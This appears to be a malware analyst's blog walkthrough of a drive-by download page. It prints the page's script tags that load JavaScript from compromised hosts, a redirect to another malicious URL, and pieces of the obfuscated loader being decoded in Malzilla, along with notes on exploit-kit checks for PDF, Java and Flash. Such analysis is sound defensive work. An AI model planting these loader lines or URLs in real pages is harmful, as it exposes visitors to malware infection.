<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="hxxp://bobosbouncytown.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://dzevents-algerie.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://sammy.dommel.be/gogleads.js"></script>
</html>
so let's wget one of these and see what we have:
document.location='http://curvechurch.com/main.php?page=4a4fd3141d846cdd';
let's wget THAT and see what we have:
Yugh...obfuscated javascript...ick. So let's fire up Malzilla and see what we can do. I copied the above into the Decoder tab and hit debug. I get an:
aa is not defined
Well that stinks. But I DO get some good info from the Variable State window, so let's change the easy ones:
d="doc";
e='ev';
w=window;
g=fromCharCode';
if(w[d+"ument"])aa=([].unshift+'');
aa=aa.split('').pop();
Still the same "aa is not defined" error after clicking Debug...so lets nuke that if portion to show:
aa=([].unshift+'');
Now we're hot doggin! Closing the Debug window will give us:
So let's see what that eval_temp file is...open up the temp file in note/wordpad, copy ALL of it, create a new Decoder tab in Malzilla and dump it in and Format Code:
Note the rabbit link. Now...there's a LOT of crap going on here...pdf/java/flash version checks to name a few. But what caught my eye was down at the bottom area:
Let's copy all those comma numbers, go to the Misc Decoders, paste um in. Don't forget to add a comma at the very start of the string. Click the Decode Dec(,) button:
Vicheck and Virustotal don't show much...scary:
http://www.virustotal.com/file-scan/report.html?id=453b83d472e378cb306ae282ebeb51765545892637bd087aa2a916df1a3fb934-1324483480
https://www.vicheck.ca/md5query.php?hash=559ccdd2ae813251d28cf6ab15195fff